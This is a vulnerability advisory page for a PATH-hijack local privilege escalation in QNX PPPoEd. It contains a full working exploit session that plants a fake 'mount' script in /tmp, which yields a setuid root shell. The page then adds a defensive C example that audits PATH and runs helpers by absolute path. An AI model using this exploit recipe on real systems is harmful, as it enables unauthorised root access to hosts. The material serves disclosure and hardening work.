QNX PPPoEd 2.4/4.25/6.2 – Path Environment Variable Local Command Execution

Vulnerability ID 1054580 Vulnerability type
Published 2004-09-03 Updated 2004-09-03
CVE ID N/A
CNNVD-ID N/A
Platform Linux CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/24570
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/11105/info

QNX PPPoEd is reported prone to a problem in the way it handles paths to the external executables that it invokes. Because of this, an attacker may be able to gain elevated privileges on a host with a vulnerable version of PPPoEd installed.

$ cd /tmp
$ cat << _EOF_ > mount
#!/bin/sh
cp /bin/sh /tmp/rootshell
chown root /tmp/rootshell
chmod 4777 /tmp/rootshell
echo "Here comes your root shell"
_EOF_

$ chmod 755 mount
$ export PATH=/tmp:$PATH
$ /usr/sbin/pppoed
$ ls -la /tmp
-rwxr-xr-x 1 sandimas users 88 Aug 25 2004 mount
-rwsrwxrwx 1 root 100 153384 Jun 22 2001 /tmp/rootshell
$ /tmp/rootshell
Here comes your root shell
# uname -a
QNX sandimas 6.1.0 2001/06/25-15:31:48 edt x86pc x86
#
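
The session above works because a privileged program resolves a helper name such as mount through the caller's PATH. The following is an added defensive example, not code from QNX or from the original advisory: it audits a search path and runs a helper by absolute path with a fixed environment. The function names, the 1024-byte buffer and the PATH=/bin:/usr/bin environment are assumptions of this example.

```c
#define _XOPEN_SOURCE 700
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Trusted search directory: root-owned, not group- or world-writable. */
int dir_mode_is_safe(uid_t owner, mode_t mode) {
    return owner == 0 && S_ISDIR(mode) && !(mode & (S_IWGRP | S_IWOTH));
}

/* Count PATH entries a privileged program must not search: empty entries
 * (they mean the current directory), relative ones, missing or unsafe dirs. */
int count_unsafe_path_entries(const char *path) {
    int unsafe = 0;
    for (const char *p = path;;) {
        size_t len = strcspn(p, ":");
        char dir[1024];                 /* assumed upper bound per entry */
        struct stat st;
        if (len == 0 || p[0] != '/' || len >= sizeof dir) {
            unsafe++;
        } else {
            memcpy(dir, p, len);
            dir[len] = '\0';
            if (stat(dir, &st) != 0 || !dir_mode_is_safe(st.st_uid, st.st_mode))
                unsafe++;
        }
        if (p[len] == '\0')
            return unsafe;
        p += len + 1;
    }
}

/* Run a helper without consulting the caller's PATH: absolute path only,
 * execve() (no shell, no search) and a fixed environment. -1 on error. */
int run_helper(const char *abs_path, char *const argv[]) {
    static char *const clean_env[] = { "PATH=/bin:/usr/bin", NULL };
    int status;
    pid_t pid;
    if (abs_path[0] != '/' || (pid = fork()) < 0)
        return -1;      /* a bare name would need a PATH search: refuse */
    if (pid == 0) {
        execve(abs_path, argv, clean_env);
        _exit(127);     /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

A set-uid program would call run_helper() with the helper's full path and treat any non-zero result of count_unsafe_path_entries() on an inherited PATH as a reason to replace that PATH before doing anything else.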
